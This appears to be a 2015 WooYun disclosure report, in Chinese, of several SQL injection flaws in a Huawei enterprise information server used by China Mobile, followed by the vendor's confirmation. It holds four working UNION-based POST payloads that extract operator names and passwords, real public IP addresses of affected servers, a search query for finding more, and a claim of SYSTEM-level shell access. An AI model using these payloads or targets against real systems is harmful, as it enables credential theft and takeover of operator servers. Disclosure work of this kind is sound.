当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123639

漏洞标题:华为企业代理服务器多处SQL注入漏洞打包/SA(SYSTEM)权限

相关厂商:华为技术有限公司

漏洞作者: 路人甲

提交时间:2015-06-30 12:33

修复时间:2015-09-29 10:48

公开时间:2015-09-29 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向第三方安全合作伙伴开放
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开

简要描述:

某运营商使用的系统多处SQL注入漏洞打包,SA(SYSTEM)权限

详细说明:

中国移动大量使用的某系统多处SQL注入漏洞打包,SA(SYSTEM)权限
之前漏洞让提交案例……不好意思,给忘记了……现在补上
案例:

如果下面的不够:使用zoomeye搜索:Server: Resin/2.1.10  country:China
http://122.224.89.219/mms/musicManager.jsp
http://61.233.42.78/mms/musicManager.jsp
http://61.153.181.190:81/mms/musicManager.jsp
http://61.236.195.164/mms/musicManager.jsp
http://61.233.42.73/mms/musicManager.jsp


222.JPG


各种信息泄露,以及注入点SA权限,直接获取SYSTEM,可以添加用户远登~


系统同: WooYun: 企业代理服务器设计问题
由于涉及中国移动(使用)和华为(开发),故交由厂商写着CNCERT协调
一共4处注入,分别POC如下
POC:
1.

/mms/musicManager.jsp POST:musicType=0&musicByname=0' UNION ALL SELECT top 1 NULL,NULL,password,NULL,NULL,NULL,NULL,NULL from tbl_Operator--&findNowBut=%B2%E9%D1%AF&page=1&isFindNow=1


2.

/mms/musicList.jsp POST:musicTypeadmin=0' UNION ALL SELECT top 1 NULL,NULL,Operator_Code,NULL,NULL,NULL,NULL,NULL from tbl_Operator-- &musicType=0&musicByname=aaa&findNowBut=%B2%E9%D1%AF&page=1&isFindNow=1


3.

/mms/picList.jsp POST:picTypeadmin=0' UNION ALL SELECT top 1 NULL,NULL,Operator_Code,Operator_Code,NULL,NULL,NULL,NULL from tbl_Operator-- &picType=0&picByname=aaa&findNowBut=%B2%E9%D1%AF&page=1&isFindNow=1


4.

/mms/picManager.jsp POST:picType=0' UNION ALL SELECT top 1 NULL,Operator_Code,Password,NULL,NULL,NULL,NULL,NULL from tbl_Operator-- &picByname=aaa&findNowBut=%B2%E9%D1%AF&page=1& isFindNow=1&picByname=aaa&findNowBut=%B2%E9%D1%AF&page=1&isFindNow=1


证明图:

21.jpg


22.jpg


23.jpg


24.jpg


再来看看系统权限:
--OS-SHELL:得到:nt authority\system。。。。这都SYSTEM了,不需要我拿SHELL和登录了吧。。。


4.jpg

漏洞证明:

3.jpg


4.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-01 10:47

厂商回复:

多谢白帽子对华为公司IT安全的关注。该漏洞存在于企业信息机产品EIE V400R001版本中,该版本已于2014年6月30日EOS(End of Service)。

最新状态:

暂无